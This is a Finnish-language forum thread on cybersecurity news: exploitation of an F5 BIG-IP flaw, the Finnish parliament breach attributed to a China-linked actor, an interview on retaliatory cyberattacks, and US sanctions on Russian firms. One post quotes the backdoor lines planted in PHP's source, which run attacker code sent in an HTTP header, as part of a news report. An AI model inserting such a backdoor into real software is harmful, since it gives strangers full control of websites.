Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

ctg

Greatest Leader
Toivottavasti meillä on päivitykset kunnossa

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.

The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.

Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.

Tiedän kokemuksesta kuinka nihkeitä nämä päivitykset on firmoissa.
 

Rauhantekijä

Respected Leader
Suojelupoliisi epäilee Kiinaan sidoksissa olevaa toimijaa Eduskunnan tietomurrosta. Kun tutkinnan rikosnimikkeinä ovat törkeä vakoilu, törkeä tietomurto ja törkeä viestintäsalaisuuden loukkaus, jokainen ymmärtää, miten vakavasta asiasta on kyse. Edelleen keskustelu on siihen suuntaan että Suomi tulee reagoimaan ja vastaamaan jollain tavalla tähän tekoon.


No mitäs veikkaatte, mikä on Suomen jyröhdys Kiinan suuntaan?
Olisiko se, että "hakekaa pandat pois, meillä pidetään vain ystävyyden merkkejä" ? Vai mitä se olisi?

.
 

Rauhantekijä

Respected Leader
Ei muuta kuin asia viedään Haagiin ja annetaan niiden päättää miten vastataan.
Ei kai tässä Haagia tarvita sen enempää kuin Suomeen kohdistuvissa ilmatilaloukkauksissakaan. Hoidetaan ihan ite tavalla joka päätetään.
Mitä olis?
 
  • Tykkää
Reactions: ctg

ctg

Greatest Leader
convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.
 

ctg

Greatest Leader
@Rauhantekijä

Can nation-states defend themselves from hackers and one another?​

Steven Cherry Yeah, I mean, this militarization can involve actual counterattacks, right? I mean, in Trickbot there was one. Microsoft went to the courts to be allowed to conduct a counterattack on the malware. And it’s as if the courts are there to reassure us that Microsoft is one of the good guys and its enemies are the bad guys and it’s okay for Microsoft to strike back. Does that sound right? And in your opinion of the courts up to serving in that role?

Justin Cappos I think this is a very difficult question. There are judges that know quite a bit about security. If I think you took the average judge in the average court, I think they’re absolutely not prepared for this. I certainly wouldn’t want to try to speak for all judges because I have seen some very well reasoned things come out of individual judges here and there who really do seem to understand the technologies and things involved that at a reasonable level to make that judgment.

I do feel overall that going in launching counterattacks is a very, very problematic way of dealing with things because there tends to be collateral damage and there tends to be other types of problems from launching counterattacks. In some ways, it’s a little bit like bringing in an outside species to try to control the problem you have with some other pests where time and time again humans have tried. Oh, we’re going to just we’re going to bring in the cane toads to eat these flies that are plaguing our sugar cane plants or we’re going to bring in this, or we’re going to do that. It just has a way of escalating and getting out of control and causing more damage than perhaps it should. So in general, I think that there are often other ways you can go about this, sort of depending on how you need to strike back and where. But I think that in general, launching retaliatory cyber attacks is a bad idea.

 

ctg

Greatest Leader
@Rauhantekijä

The US Treasury Department, meanwhile, imposed sanctions to retaliate for what it said were “aggressive and harmful activities by the Government of the Russian Federation.” The measures include new prohibitions on Russian sovereign debt and sanctions on six Russia-based firms that the Treasury Department said “supported the Russian Intelligence Services’ efforts to carry out malicious cyber activities against the United States.”

The firms are:
  • ERA Technopolis, a research center operated by the Russian Ministry of Defense for transferring the personnel and expertise of the Russian technology sector to the development of technologies used by the country’s military. ERA Technopolis supports Russia’s Main Intelligence Directorate (GRU), a body responsible for offensive cyber and information operations.
  • Pasit, a Russia-based information technology company that has conducted research and development supporting malicious cyber operations by the SVR.
  • SVA, a Russian state-owned research institute specializing in advanced systems for information security located in that country. SVA has done research and development in support of the SVR’s malicious cyber operations.
  • Neobit, a Saint Petersburg, Russia-based IT security firm whose clients include the Russian Ministry of Defense, SVR, and Russia’s Federal Security Service. Neobit conducted research and development in support of the cyber operations conducted by the FSB, GRU, and SVR.
  • AST, a Russian IT security firm whose clients include the Russian Ministry of Defense, SVR, and FSB. AST provided technical support to cyber operations conducted by the FSB, GRU, and SVR.
  • Positive Technologies, a Russian IT security firm that supports Russian Government clients, including the FSB. Positive Technologies provides computer network security solutions to Russian businesses, foreign governments, and international companies and hosts recruiting events for the FSB and GRU.
“The reason they were called out is because they’re an integral part and participant in the operation that the SVR executes,” Joyce said of the six companies. “Our hope is that by denying the SVR the support of those companies, we’re impacting their ability to project some of this malicious activity around the world and especially into the US.”
 
Top